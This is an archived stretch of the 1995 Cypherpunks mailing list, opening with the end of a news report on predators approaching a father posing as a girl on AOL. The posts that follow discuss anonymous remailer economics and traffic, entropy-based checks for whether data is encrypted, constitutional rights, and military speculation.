playing them or figuring out whether there's a problem, go to your local police department. Most will be happy to help." 
End Article 2 Article 3 Chilling messages made dad take action By Kieran Crowley George Telesha couldn't believe his ears. Or his modem. Telesha, 46, a bank computer specialist and president of the Westchester chapter of the Fathers Rights Association, heard from several dads that their kids were accessing porn on their home computers. So he decided to take a walk on the wild side -- on the information superhighway. Telesha, the father of two, pretended to be a 14-year-old girl named "Suzy" on an America Online computer bulletin board. He said he was besieged with perverts who sent dirty pictures. Telesha said several men sent "Suzy" porno pictures, tried to get her address and phone number -- and tried to lure her out of her home. "Can I come up to New York?" one out-of-state man said. "Can I meet you? You don't have to tell your parents." When "Suzy" mentioned her parents were not home, another man became very insistent, Telesha said. "I live in New York. Can I come over? I'll take you shopping," the man messaged "Suzy" in trying to set up a date at a local mall. One man said he lived in New Jersey and invited "Suzy" over for a photo session. Telesha said his most disturbing exchange was with a man who sent child sex pictures. "Do you have any more of these?" Telesha asked. "Usually, it's just one session," the man typed back. "That sent chills through me," said Telesha, fearing the photographed children may have been harmed. "It's mind-boggling. I haven't slept in a week. What happened to the children in these pictures? What is going to happen to them?" One AOL subscriber even offered hints on how to pick up young girls and take pornographic pictures of them Telesha said. "I think people ought to know what's going on. I just want to see it stopped," he said. End Article 3 [Article 4 reports on exchanges between Telesha masquerading as three different girls and AOL subscribers. Too disgusting to post. Censorship imposed for lurking kiddies.] 
From jcorgan at scruznet.com Wed Jan 11 15:10:45 1995
From: jcorgan at scruznet.com (Johnathan Corgan)
Date: Wed, 11 Jan 95 15:10:45 PST
Subject: Remailer traffic loads?
Message-ID:

-----BEGIN PGP SIGNED MESSAGE-----

Is there someplace that remailer operators routinely post information about traffic load?

The reason I ask is that this issue can have a bearing on selection of remailers for chaining. Using Raph's list, one can gather an approximate feel for latency and reliability, but there is no way to know if a site is forwarding hundreds or thousands of messages a day (which would be good for traffic analysis), or just a few tens (which makes in/out analysis much easier.)

Raph's list is a good 'reputation' system; however, it lacks this one bit of info which would be immensely helpful.

Periodic postings of remailer frequency usage to alt.privacy.anon-server by the operators would be one way to propagate this info.

Of course, I may be overlooking something basic: Would posting this info pose any kind of security weakness? I imagine not; if someone wants to get this info for traffic analysis, they just watch the remailer for a day or so.

==
Johnathan Corgan         "Violence is the last refuge of the incompetent."
jcorgan at scruznet.com  -Isaac Asimov

-----BEGIN PGP SIGNATURE-----
Version: 2.6.2

iQCVAwUBLxRlJU1Diok8GKihAQHdJgP+IlVlKRkCbZQCjr9VgEgWLt0dY2jP4s5k
WcRkpBHXnFxV2nkM2zF9L/UMf1hKkfcdqZj5FuLWLUE48pPvfZuhRebMq8BBay6R
5k0PiA095561uJb6T1mIwm+Tb3x/KZ/ZCMceoe5SA2lu8b6vmh+QdS/ZOc1aFsIj
rhrquyzeCZs=
=yjPJ
-----END PGP SIGNATURE-----

From anonymous-remailer at shell.portal.com Wed Jan 11 15:37:16 1995
From: anonymous-remailer at shell.portal.com (anonymous-remailer at shell.portal.com)
Date: Wed, 11 Jan 95 15:37:16 PST
Subject: Storm Signals
Message-ID: <199501112337.PAA20199@jobe.shell.portal.com>

> > > > 1: Somebody's roommate (a Green Beret) has been called back into > > > > 6 months of active service. He was not told where he'd be. > > > Perhaps Bosnia?
> > > > I doubt it. [...] > > > > Military action also requires political will, and with the recent change > in power in the US govt there is no way anything is going to happen for at > least six months. Freshmen congressmen do not sign off on a war the first

True. But clandestine operations don't require the approval of Congress. In fact, the prez never has to admit they exist. Ever. Read the Pentagon Papers.

-Rat

From lmccarth at ducie.cs.umass.edu Wed Jan 11 15:50:04 1995
From: lmccarth at ducie.cs.umass.edu (L. McCarthy)
Date: Wed, 11 Jan 95 15:50:04 PST
Subject: Remailer traffic loads?
Message-ID: <199501112355.SAA15222@bb.hks.net>

-----BEGIN PGP SIGNED MESSAGE-----

> Is there someplace that remailer operators routinely post information
> about traffic load?

Remailers operating Matt Ghio's or Lance Cottrell's software should autoreply to a message with "Subject: remailer-stats" with a bar chart indicating the number of messages remailed in each of the past 24 hours.

- ---
[This message has been signed by an auto-signing service. A valid signature means only that it has been received at the address corresponding to the signature and forwarded.]

-----BEGIN PGP SIGNATURE-----
Version: 2.6.2
Comment: Gratis auto-signing service

iQBFAwUBLxRvwioZzwIn1bdtAQFdEQF/dTXM3ii1pAHUV108kMx8N3urhv/HAHQc
IZHLEqfOcNTDaV6ZrDxuT+0AZzhdu8rL
=ZKwP
-----END PGP SIGNATURE-----

From dave at esi.COM.AU Wed Jan 11 16:01:22 1995
From: dave at esi.COM.AU (Dave Horsfall)
Date: Wed, 11 Jan 95 16:01:22 PST
Subject: Storm Signals
In-Reply-To: <199501111859.AA02457@poboy.b17c.ingr.com>
Message-ID:

On Wed, 11 Jan 1995, Paul Robichaux wrote:

> If I were the DOD, I would set the standard GPS default to selective
> availability. After all, with SA on military receivers can still get
> fine positioning data. If someone could come up with a good reason to
> turn SA off, great, but I wouldn't leave it on otherwise.

This gets discussed to death over on the sci.geo.satellite-nav group.
The consensus is that you don't want to advertise your intentions, but political considerations have always overridden practicalities.

> The scenarios concerning GPS-piloted Cessnas full of nasty stuff come
> to mind, especially vis-a-vis the North Koreans. They probably don't
> have accurate IRBMs but they certainly could cobble together a
> Learjet-based delivery system.

This too gets discussed to death over on the sci.geo.satellite-nav group. The consensus is that a car-bomb is cheaper and more reliable, and needs nothing more than a street-directory for navigation.

--
Dave Horsfall (VK2KFU) | dave at esi.com.au | VK2KFU @ VK2AAB.NSW.AUS.OC | PGP 2.6
Opinions expressed are mine. | E7 FE 97 88 E5 02 3C AE 9C 8C 54 5B 9A D4 A0 CD

From pierre at shell.portal.com Wed Jan 11 16:05:01 1995
From: pierre at shell.portal.com (Pierre Uszynski)
Date: Wed, 11 Jan 95 16:05:01 PST
Subject: Remailing pricing and cover traffic
Message-ID: <199501120004.QAA24479@jobe.shell.portal.com>

We have been debating payment systems for remailers under the following assumptions:

a) Reliable remailers will have to justify professional management by making money for their owners.
b) End-of-chain remailers will need to make money to cover for their legal expenses.
c) Payment would limit abuse.

I already countered the last point. Let me try to deal with the first two to conclude that many professionally run remailers may very well stay free or close to that for a long time:

Remailers are only one of many kinds of businesses that have been described on this list. Others will include reputation markets, near-traditional banking systems, stamp issuers, certification agencies, data havens etc... But we have also seen that nearly all other forms of businesses already now cannot but run afoul of a tentacular law at some time or other.
We have concluded that many of these businesses would migrate to cypherspace, hiding their locations, owners, books, assets and other information too dangerous to keep in the open.

Each such organisation will generate lots of traffic, in part under control of whoever is trying to do business with it. So they are potentially easily traceable and subject to legal or violent consequences.

A possible solution is of course for their sites to be remailers too. Lots of non-descript remailers, trading lots of encrypted traffic, a lot of it remailer management info and bogus filler traffic. When you are one of many, and people correspond with you only through limited traffic anonymous response blocks, then the remailers help you stay hidden by providing cover traffic.

But for this to work you must consistently attract a lot of cover traffic through your remailer(s). If others undercut your stamp price, or best your reliability status, you are in trouble because traffic will migrate to other more competitive remailers, and you will be left dry on the sand with the task to generate believable cover traffic yourself. You are also competing with the cypherspace customers hiding their own personal traffic under cover of "everyone-a-remailer" remailers.

It may well be much simpler for cypherbusinesses to stay competitive on the "middle" remailer market, even at a loss, and to transmit volumes of believable (because real) cover traffic. End-of-chain (or more precisely "clear-text") remailers can be expected to be a minority as, after all, they are only needed to post to public forums. Maybe these will charge a fee. For the others, the more and bigger "porn GIFs" go through (even for free), the better...

However, large free remailers may then arouse suspicion: There is little reason to run a heavy traffic remailer for free, apart from getting cover traffic.
Competition may then settle at a small price, far from enough to keep the remailer running, but enough to not be too conspicuous. Or better, non-profit remailers may become ubiquitous, being used in part to provide cover traffic and in part to transfer money from the cypherspace businesses to cover for the cost of the computers and obvious living expenses.

Between cypherbusinesses, everyone-a-remailer operations, and a few real non-profits, most remailing may stay close to free for a long time. Untraceable money will be useful for all kinds of things, but maybe not so much for remailing.

Pierre.
pierre at shell.portal.com

From pstemari at erinet.com Wed Jan 11 16:06:04 1995
From: pstemari at erinet.com (Paul J. Ste. Marie)
Date: Wed, 11 Jan 95 16:06:04 PST
Subject: Getting on the list
Message-ID: <9501112357.AB02726@eri.erinet.com>

At 11:55 AM 1/11/95 -0800, John Draper wrote:
> ... I tried the usual request to cypherpunks-request at toad.com, but haven't
>been successful.
>
>Who is maintaining the list these days? Does it still exist? And
>why haven't any of my requests been honored?

Cypherpunks uses the majordomo software. Try sending a message to majordomo at toad.com containing the following two lines:

help
subscribe cypherpunks

--Paul J. Ste. Marie
pstemari at well.sf.ca.us, pstemari at erinet.com

From pstemari at erinet.com Wed Jan 11 16:11:43 1995
From: pstemari at erinet.com (Paul J. Ste. Marie)
Date: Wed, 11 Jan 95 16:11:43 PST
Subject: Pornography, What is it?
Message-ID: <9501112356.AA02726@eri.erinet.com>

At 11:33 PM 1/10/95, Timothy C. May wrote:
> ... I'm not a lawyer, and it's been 25 years since I was in a "civics"
>class, so I'm sorry to not recall the precise language by which
>"Congress shall make no law" also is taken to apply to Sacramento,
>Albany, Austin, and so forth.

The 14th Amendment extended the restrictions that the Bill of Rights place on the Federal Gov't to the state gov'ts.

--Paul J. Ste.
Marie pstemari at well.sf.ca.us, pstemari at erinet.com

From root at einstein.ssz.com Wed Jan 11 16:41:14 1995
From: root at einstein.ssz.com (root)
Date: Wed, 11 Jan 95 16:41:14 PST
Subject: Pornography, What is it?
In-Reply-To: <9501112356.AA02726@eri.erinet.com>
Message-ID: <199501120029.SAA00164@einstein.ssz.com>

>
> At 11:33 PM 1/10/95, Timothy C. May wrote:
> > ... I'm not a lawyer, and it's been 25 years since I was in a "civics"
> >class, so I'm sorry to not recall the precise language by which
> >"Congress shall make no law" also is taken to apply to Sacramento,
> >Albany, Austin, and so forth.
>
> The 14th Amendment extended the restrictions that the Bill of Rights place
> on the Federal Gov't to the state gov'ts.
>
>
> --Paul J. Ste. Marie
> pstemari at well.sf.ca.us, pstemari at erinet.com
>

Article XIV (1868)

Sec. 1. All persons born or naturalized in the United States, and subject to the jurisdiction thereof, are citizens of the United States and of the States wherein they reside. No state shall make or enforce any law which shall abridge the privileges or immunities of citizens of the United States; nor shall any State deprive any person of life, liberty, or property, without due process of law; nor deny to any person within its jurisdiction the equal protection of the laws.

Where in there is the protection you speak of? I see no guarantee of my Constitutional rights, only of privileges and immunities as granted by the federal government.

The 1st Amendment says:

Article 1 (1791)

Congress shall make no law respecting an establishment of religion, or prohibiting the free exercise thereof; or abridging the freedom of speech, or of the press; or the right of the people to assemble, and to petition the government for a redress of grievances.

Let's examine the first part of this article. Since Congress is prohibited from making any law (ie no law) respecting religion it follows they don't even get the opportunity to define religion.
When one considers the Supreme Court's view of Rastafarians, Coptics, and the Native American Church it is clear they are making laws respecting an establishment of religion. It is also clear they are prohibiting the free exercise thereof as well. The attacks on freedom of speech are quite clear and I won't go into them. The last part is quite irrelevant since as citizens we can't even sue the government in civil court without first getting its permission. Not what I would call supporting our rights to redress of grievances.

Article IV (1791)

The right of the people to be secure in their persons, houses, papers, and effects, against unreasonable searches and seizures, shall not be violated, and no warrants shall issue, but upon probable cause, supported by oath or affirmation, and particularly describing the place to be searched, and the persons or things to be seized.

Have you ever heard of the DoJ Forfeiture Super Fund? Why do courts allow law enforcement to act upon anonymous tips when no oath or affirmation is given in such a case?

Article V (1791)

No person shall be held to answer for a capital, or otherwise infamous crime, unless on a presentment or indictment of a grand jury, except in cases arising in the land or naval forces, or in the militia, when in actual service in time of war or public danger; nor shall any person be subject for the same offence to be twice put in jeopardy of life or limb; nor shall be compelled in any criminal case to be a witness against himself, nor deprived of life, liberty, or property, without due process of law; nor shall private property be taken for public use, without just compensation.

The last sentence is the most commonly broken aspect of this amendment. A strong case could be made that breathalyzer, blood tests, and such also violate the spirit and letter of this article.
Article VI (1791)

In all criminal prosecutions, the accused shall enjoy the right to a speedy and public trial, by an impartial jury of the State and district wherein the crime shall have been committed, which district shall have been previously ascertained by law, and to be informed of the nature and cause of the accusation; to be confronted with the witnesses against him; to have compulsory process for obtaining witnesses in his favor, and to have the assistance of counsel for his defence.

Seems to me that according to this anonymous witnesses should not be allowed in any case. Since he also has a right to a public trial the court does not have the power to exclude the press or public.

Article IX (1791)

The enumeration in the Constitution, of certain rights shall not be construed to deny or disparage others retained by the people.

This article states quite clearly and simply that if there is any doubt as to whether it is a right the resolution shall be found in favor of the people.

Article X (1791)

The powers not delegated to the United States by the Constitution, nor prohibited by it to the States, are reserved to the States, or to the people.

This article states clearly that if it isn't in this document the federal government has no claim to it. The only way they may get such powers is through due process, namely constitutional amendments.

From paul at hawksbill.sprintmrn.com Wed Jan 11 16:47:14 1995
From: paul at hawksbill.sprintmrn.com (Paul Ferguson)
Date: Wed, 11 Jan 95 16:47:14 PST
Subject: Internet World on Net Security
In-Reply-To: <199501112240.RAA11895@pipe1.pipeline.com>
Message-ID: <9501120046.AA25595@hawksbill.sprintmrn.com>

>
> The entire issue of Internet World of February, 1995, is about Internet
> security, digital cash, encryption, firewalls and more. Here's the
> contents:
>

Most of them were _very_ cursory, geared more towards the neophyte. In fact, some of them were actually misleading, especially the article on firewalls.
- paul

_______________________________________________________________________________
Paul Ferguson
US Sprint                          tel: 703.689.6828
Managed Network Engineering        internet: paul at hawk.sprintmrn.com
Reston, Virginia USA               http://www.sprintmrn.com

From mccoy at io.com Wed Jan 11 17:00:07 1995
From: mccoy at io.com (Jim McCoy)
Date: Wed, 11 Jan 95 17:00:07 PST
Subject: Storm Signals
In-Reply-To: <199501112337.PAA20199@jobe.shell.portal.com>
Message-ID: <199501120100.TAA16301@pentagon.io.com>

>From some anonymous dude:

> > > > Military action also requires political will, and with the recent change > > in power in the US govt there is no way anything is going to happen for at > > least six months. Freshmen congressmen do not sign off on a war the first > > > True. But clandestine operations don't require the approval of > Congress. In fact, the prez never has to admit they exist. Ever. Read > the Pentagon Papers.

The president needs the approval of the ranking members of the Senate Intelligence Oversight committee (I think that is the one), and there is at least one republican among them...

Anyway, several thousand Green Berets does not a clandestine operation make. Secret wars are a bitch to pull off, and with a president with the lack of backbone such as Clinton they are not going to happen in the next two years.

jim

From marko at millcomm.com Wed Jan 11 19:05:20 1995
From: marko at millcomm.com (Mark Oeltjenbruns)
Date: Wed, 11 Jan 95 19:05:20 PST
Subject: How do I know if its encrypted?
Message-ID:

I keep seeing the idea that to keep out of trouble remailers and Data Havens should require that data be encrypted before it is accepted. My question is how do I know it is encrypted? If I say that anyone sending me data to be massaged by my system must first encrypt it, how do I know they are in fact complying with that request? After all this is the area for the paranoids to hang out in.

I see some possible options. Most don't seem too workable. I could ...
(1) Look at the incoming data, which of course would be impractical and defeat the whole idea.

(2) Force them to pgp it, but that could be defeated by having enough of a pgp sig. that my system is fooled. Not to mention they must use *MY* idea of what good encryption is. After all I could say you must use my encryption software that has a backdoor I know of, i.e. clipper, or that costs money and can only be bought from me. This last point would be one way of making sure you made some money, but does seem impractical.

(3) Perform a histogram analysis on it, if it doesn't pass a certain threshold reject the whole thing. Although cute, I don't like this one.

(4) Encrypt it with my own key and decrypt it before squirting it back out. This doesn't seem to gain me anything though since it could be said that I still have the ability to look at the data.

(5) Only accept data from a remailer or other service that would be guaranteed to be encrypted. This seems like it would lead to a 'good ole boy' network that could exclude service providers it doesn't like.

etc. etc.

Who's to say that the data isn't encrypted? I could be hiding a real message in that eagle spread of a porn picture. 'Simple, don't allow porn but only accepted images.' Well that certainly sounds like a can of worms waiting to squirm around your toes. Is the question of what is encrypted data similar to what material is porn or some other 'evil' data?

Am I missing something in this simple requirement of only dealing with encrypted data? Or am I simply blowing something way out of proportion?

-Mark

----------
Mark Oeltjenbruns marko at Millcomm.com N0CCQ SnipIt Research Finger for PGP key. 'My other key is 2048 bits.'

From crunch at well.sf.ca.us Wed Jan 11 19:17:34 1995
From: crunch at well.sf.ca.us (John Draper)
Date: Wed, 11 Jan 95 19:17:34 PST
Subject: Finally got on
Message-ID: <199501120317.TAA07919@well.sf.ca.us>

I finally got on...
I actually didn't get that swamped, but certainly I couldn't be expected to know that cypherpunks-request was defunkt. Oh well.

Now that I'm on, I was wondering if anyone would let me know the status of Phil Zimmerman's case, and where I can xtract any info. I've heard reports that the Govt. was planning to press charges. Just getting back on here again, I'm not in the know of these things, but can now handle large amounts of mail.

I'm also interested in knowing how I can help in Phil's defence case. Where do people mail checks to Phil's defence fund?

Anyway, glad to be back up here again.... And a big fat HAPPY NEW YEAR to all of you Cypherpunk folks!!

And Oh Yea!! Hi Brad, glad to make your acquaintance... Yup! The WELL was sure hosed today.... I'm just now getting mail that's backed up now for the 4 days I've been without power. There is ONE disadvantage of living out in the country.... Power can be a tad flakey. We've just got our power turned on today.... Yay!!! When I returned from MacWorld, things were really dark up here. :-)

Cheers
C. Crunch

PS = Scuse the formatting, I STILL cannot get Microphone to not automatically word wrap.

From tcmay at netcom.com Wed Jan 11 19:55:31 1995
From: tcmay at netcom.com (Timothy C. May)
Date: Wed, 11 Jan 95 19:55:31 PST
Subject: How do I know if its encrypted?
In-Reply-To:
Message-ID: <199501120337.TAA13574@netcom6.netcom.com>

Mark Oeltjenbruns wrote:

> I keep seeing the idea that to keep out of trouble remailers and
> Data Havens should require that data be encrypted before it is accepted.
> My question is how do I know it is encrypted? If I say that anyone sending
> me data to be massaged by my system must first encrypt it, how do I know
> they are in fact complying with that request? After all this is the area
> for the paranoids to hang out in.
> (1) Look at the incoming data, which of course would be impractical and
> defeat the whole idea.

Actually, no.
If the remailed material is encrypted, then looking at it is harmless. (And if it is not....)

The "ideal mix" neither looks at nor keeps records about remailed items, of course. The "nonideal mix" may easily insist on encryption.

I won't go through the rest of the points here, but there's a key word here: entropy. Get familiar with it now (and not just 50 years from now, when the worms and the bacteria will be giving lectures).

Abstractly, it is not possible to ever prove that a file is either encrypted or unencrypted. Practically, encrypted files have high entropy per character (characters appear with approximately equal frequency), while unencrypted files have relatively low entropy, reflecting the patterns and n-tuple clusterings in ordinary languages.

Sophisticated entropy measures are available, and have been discussed here. But there's an easier approach: try to compress the file.

An encrypted ( = high entropy) file will generally not compress, and may even expand in size. An ordinary message in English or Dutch or whatever, such as this one, will compress significantly, to perhaps half its uncompressed size.

(Quibblers, this is the place where you announce the precise compression seen...)

--Tim May

--
..........................................................................
Timothy C. May         | Crypto Anarchy: encryption, digital money,
tcmay at netcom.com     | anonymous networks, digital pseudonyms, zero
                       | knowledge, reputations, information markets,
W.A.S.T.E.: Aptos, CA  | black markets, collapse of governments.
Higher Power: 2^859433 | Public Key: PGP and MailSafe available.
Cypherpunks list: majordomo at toad.com with body message of only: subscribe cypherpunks. FAQ available at ftp.netcom.com in pub/tc/tcmay

From spam at telerama.lm.com Wed Jan 11 20:31:23 1995
From: spam at telerama.lm.com (Steve Marting)
Date: Wed, 11 Jan 95 20:31:23 PST
Subject: How do I know if its encrypted?
In-Reply-To:
Message-ID: <3f2ba8$jbe@asia.lm.com>

In article , Mark Oeltjenbruns wrote:
> I keep seeing the idea that to keep out of trouble remailers and
>Data Havens should require that data be encrypted before it is accepted.
>My question is how do I know it is encrypted? If I say that anyone sending
>me data to be massaged by my system must first encrypt it, how do I know
>they are in fact complying with that request? After all this is the area
>for the paranoids to hang out in.
>
> I see some possible options. Most don't seem too workable. I could
>...
[...]
>(2) Force them to pgp it, but that could be defeated by having enough of a
>pgp sig. that my system is fooled. Not to mention they must use *MY* idea
>of what good encryption is. After all I could say you must use my
>encryption software that has a backdoor I know of, i.e. clipper, or that
>costs money and can only be bought from me. This last point would be one
>way of making sure you made some money, but does seem impractical.

You're being contradictory here. First you say that you have no way of reliably knowing if it's PGP encrypted, then you say it forces them to use a certain type of encryption. Well, if they can fool your system, they aren't forced to use it!

But that's not really my point. I think this method is very valid and could be used in the Real World (well, on the net, at least). Let's say you require everyone to use PGP. Well, if I don't trust PGP but I trust SpamCrypt, there is nothing stopping me from encrypting my data with SpamCrypt and THEN PGP and sending it off to your haven. You see the data is PGP-encrypted, you don't have the PGP key to decrypt it so you can't be accused of having the ability to look at my data, and - correct me if I'm wrong here - unless there's some specific mathematical relation between PGP and SpamCrypt, my encryption is as good as the STRONGEST layer.

In fact, as you suggest, this is a good way to implement a pay-per-use haven.
All you have to do is only let people use your proprietary data format. You can either sell just the program (a one-time fee, like selling accounts on your haven), or sell single-use keys. Single-use keys are not only a type of one-time pad (again, I may be wrong there), but can be presold in arbitrary lots so companies can buy many keys from you and resell them.

>(5) Only accept data from a remailer or other service that would be
>guaranteed to be encrypted. This seems like it would lead to a 'good ole
>boy' network that could exclude service providers it doesn't like.
>etc. etc.

I don't see the problem with this. You will end up with two types of havens - those that will accept data from a remailer anyone can use (or from a remailer that will accept data from one somewhere down the line) and those that won't. The former are free for anyone to use, and the latter aren't. Sound like the difference between moderated and unmoderated newsgroups? And I don't hear anyone on cypherpunks bitching about the evil of moderated newsgroups. What would be wrong with setting up a haven just for you and your friends? Or anyone but Detweiler? Or anyone but me?

Waiting to be called from some mistake,
-Spam
--
-- Spam is: Steve Marting My homepage Beer status: Pilsener bottled and aging

From jdwilson at gold.chem.hawaii.edu Wed Jan 11 20:47:48 1995
From: jdwilson at gold.chem.hawaii.edu (NetSurfer)
Date: Wed, 11 Jan 95 20:47:48 PST
Subject: Storm Signals
Message-ID: <199501120452.XAA17600@bb.hks.net>

-----BEGIN PGP SIGNED MESSAGE-----

> Frankly, I'm quite puzzled by these signs. I can't think of any country that
> seems due for a quick invasion by the USG, but the increase in granularity of
> the GPS information suggests an operation of greater magnitude than just a
> strike against terrorists, drug cartels etc.

The normal clear transmission mode of GPS is intentionally "granulated." It was during ODS that the "granularity" was turned off rather than on.
This was to allow them to purchase commercial GPS equipment for use in the Gulf theater. It could simply be a return to that standard mode.

- -NetSurfer

#include >>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>> == = = |James D. Wilson |V.PGP 2.7: 512/E12FCD 1994/03/17 > " " o " |P. O. Box 15432 | finger for full PGP key > " " / \ " |Honolulu, HI 96830 |====================================> \" "/ G \" |Serendipitous Solutions| Also NetSurfer at sersol.com > >>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>

- ---
[This message has been signed by an auto-signing service. A valid signature means only that it has been received at the address corresponding to the signature and forwarded.]

-----BEGIN PGP SIGNATURE-----
Version: 2.6.2
Comment: Gratis auto-signing service

iQBFAwUBLxS1iSoZzwIn1bdtAQHrdQGA4SP5Eawy54J11nCmwI2WzbYPojKeM8S+
gE1DtpEO025SZ7JsBcgoXFBdllLHclvZ
=Nl9j
-----END PGP SIGNATURE-----

From eric at remailer.net Wed Jan 11 20:51:57 1995
From: eric at remailer.net (Eric Hughes)
Date: Wed, 11 Jan 95 20:51:57 PST
Subject: How do I know if its encrypted?
In-Reply-To:
Message-ID: <199501120450.UAA29781@largo.remailer.net>

   My question is how do I know it is encrypted?

Calculate an entropy measure of some sort. Entropy is a measure of distributional skew. Maximum entropy means minimum skew.

For human-readable text of any sort, the monogram entropy, i.e. the entropy of individual characters, will _always_ be detectably less than maximal. Encrypted text will always be near maximal. The two are easy to distinguish. ASCII-armored encrypted text will always be right at 6 bits per byte.

For speed of implementation, you don't need even to look at much text. You can get a statistically significant measure quite quickly from the first couple of kilobytes.

And since you're only really worried about detecting non-randomness, you don't even need to calculate the exact entropy but rather an approximation of it.
This approximation can be done with entirely fixed point arithmetic, if you're a bit clever about it.

A practical system would cut out a notch at 6/8 for ASCII armor, which would make approximation techniques a bit tricky. More practical is just to detect ASCII armor with a regular expression recognizer and de-armor it before the entropy check.

Eric

From eric at remailer.net Wed Jan 11 20:57:42 1995
From: eric at remailer.net (Eric Hughes)
Date: Wed, 11 Jan 95 20:57:42 PST
Subject: Remailing pricing and cover traffic
In-Reply-To: <199501120004.QAA24479@jobe.shell.portal.com>
Message-ID: <199501120456.UAA29793@largo.remailer.net>

   From: Pierre Uszynski

   Let me try to deal with the first two to conclude that many professionally run remailers may very well stay free or close to that for a long time:

   [summary: cross-subsidies for hiding another businesses]

Cross-subsidies are common in other industries, why not in privacy provision? No particular reason why that won't happen. Nevertheless, the remailer is getting paid for one way or another.

In addition, virtual link encryptors to some other commercial remailer may be a better way of providing cover traffic.

It is refreshing, though, to see thoughtful discussion about alternate economic arrangements. The twin requirements of supporting the physical remailer and preventing swamping do not immediately and necessarily lead to pay-per-use.

Eric

From eric at remailer.net Wed Jan 11 21:04:05 1995
From: eric at remailer.net (Eric Hughes)
Date: Wed, 11 Jan 95 21:04:05 PST
Subject: Multiple symetric cyphers
In-Reply-To: <199501112303.SAA14726@bb.hks.net>
Message-ID: <199501120502.VAA29808@largo.remailer.net>

   From: cactus at seabsd.hks.net (L. Todd Masco)

   I'm wondering: would the strength be increased by using a randomly selected symetric cypher?

Strength is not the right aspect. Global risk is reduced, simply because the aggregate cost of a breach is reduced.
But selecting a single cipher is just as much a fixed policy as a randomly selected one is. Far better to let the user pick a policy, both about sent and accepted ciphers.

   I guess this reduces to: do strong cyphers have "signatures" of some sort, by which the type of encryption can be derived?

If they do, they're likely not _strong_ ciphers.

Eric

From eric at remailer.net Wed Jan 11 21:07:27 1995
From: eric at remailer.net (Eric Hughes)
Date: Wed, 11 Jan 95 21:07:27 PST
Subject: Why use plastic for remailers and DH?
In-Reply-To:
Message-ID: <199501120505.VAA29815@largo.remailer.net>

   From: Angus Patterson

   This point may have been raised before, but anyway, unless you're using a swiss-bank issued credit card [etc. ...], why would anybody want to use something as completely traceable as a credit card to pay for a remailer or a data haven?

Because not everyone needs paranoid levels of security. Just because the truly paranoid won't use a service doesn't make it useless.

Verbum sapienti...

Eric

From carolb at barton.spring.com Wed Jan 11 21:08:43 1995
From: carolb at barton.spring.com (Censored Girls Anonymous)
Date: Wed, 11 Jan 95 21:08:43 PST
Subject: Storm Signals
In-Reply-To: <199501110911.DAA05932@pentagon.io.com>
Message-ID:

A paratrooper girl named Christina, had just finished paratrooper school at Ft. Bragg. She was headed to Mpls, right around Halloween. Then we didn't hear from her for almost a month. Then came the Panama, troop action, over the Haitian refugees. She didn't get picked, so they let her come to Mpls, finally.

If something goes quiet, you can be sure something's up. I'd start betting on a Cuban thing first, as Castro isn't getting any younger. The U.S. needs the insurgent people in Cuba rather than having them over here. That's my "guess".

RegisteredBEllcore Trusted Software Integrity system programmer
***********************************************************************
Carol Anne Braddock "Give me your Tired, your Poor, your old PC's..."
The TS NET REVOKED PGP KEY NO.0C91594D
carolb at spring.com carolann at mm.com
************************************************************************
COMING SOON TO AN INTERNET NEWSGROUP NEAR YOU...............CENSORED.COM

From pstemari at erinet.com Wed Jan 11 21:23:22 1995
From: pstemari at erinet.com (Paul J. Ste. Marie)
Date: Wed, 11 Jan 95 21:23:22 PST
Subject: Getting on the list
Message-ID: <9501120515.AB10649@eri.erinet.com>

At 06:57 PM 1/11/95 EST, Paul J. Ste. Marie wrote:

(something I didn't mean to send out to cypherpunks)

Sorry.

--Paul J. Ste. Marie
pstemari at well.sf.ca.us, pstemari at erinet.com

From jamesd at netcom.com Wed Jan 11 21:29:13 1995
From: jamesd at netcom.com (James A. Donald)
Date: Wed, 11 Jan 95 21:29:13 PST
Subject: How do I know if its encrypted?
In-Reply-To:
Message-ID:

On Wed, 11 Jan 1995, Mark Oeltjenbruns wrote:
> (3) Perform a histogram analysis on it, if it doesn't pass a certain
> threshold reject the whole thing. Although cute, I don't like this one.

Why not -- sounds cool to me. It is also very fast, and does not take much programming.

It will stop all cleartext. Probably some pictures would get through, so it would not stop mailbombings, but a volume limitation per apparent user and apparent destination would stop mailbombings.

A volume limitation sounds like a lot of work to program though.

---------------------------------------------------------------------
We have the right to defend ourselves and our
property, because of the kind of animals that we    http://nw.com/jamesd/
are. True law derives from this right, not from     James A. Donald
the arbitrary power of the omnipotent state.        jamesd at netcom.com

From pstemari at erinet.com Wed Jan 11 21:29:38 1995
From: pstemari at erinet.com (Paul J. Ste. Marie)
Date: Wed, 11 Jan 95 21:29:38 PST
Subject: How do I know if its encrypted?
Message-ID: <9501120521.AA10718@eri.erinet.com>

At 07:37 PM 1/11/95, Timothy C. May wrote:
> ...
> (Quibblers, this is the place where you announce the precise compression
> seen...)

PKZIP (R) FAST! Create/Update Utility Version 2.04g 02-01-93
Copr. 1989-1993 PKWARE Inc. All Rights Reserved. Shareware Version
PKZIP Reg. U.S. Pat. and Tm. Off. Patent No. 5,051,745

_ 80386 CPU detected.
_ EMS version 4.00 detected.
_ XMS version 2.00 detected.
_ DPMI version 0.90 detected.
_ Using Normal Compression.

Creating ZIP: MAY.ZIP
Adding: MAY.TXT Deflating (49%), done.

A pretty good guess, actually.

--Paul J. Ste. Marie
pstemari at well.sf.ca.us, pstemari at erinet.com

From daleh at ix.netcom.com Wed Jan 11 21:41:55 1995
From: daleh at ix.netcom.com (Dale Harrison AEGIS)
Date: Wed, 11 Jan 95 21:41:55 PST
Subject: How do I know if its encrypted?
Message-ID: <199501120540.VAA11357@ix3.ix.netcom.com>

You wrote:
> > My question is how do I know it is encrypted?
>
>Calculate an entropy measure of some sort. Entropy is a measure of
>distributional skew. Maximum entropy means minimum skew.
>
>For human-readable text of any sort, the monogram entropy, i.e. the
>entropy of individual characters, will _always_ be detectably less
>than maximal. Encrypted text will always be near maximal. The two
>are easy to distinguish. ASCII-armored encrypted text will always be
>right at 6 bits per byte.
>
>For speed of implementation, you don't need even to look at much text.
>You can get a statistically significant measure quite quickly from the
>first couple of kilobytes.
>
>And since you're only really worried about detecting non-randomness,
>you don't even need to calculate the exact entropy but rather an
>approximation of it. This approximation can be done with entirely
>fixed point arithmetic, if you're a bit clever about it.
>
>A practical system would cut out a notch at 6/8 for ASCII armor, which
>would make approximation techniques a bit tricky. More practical is
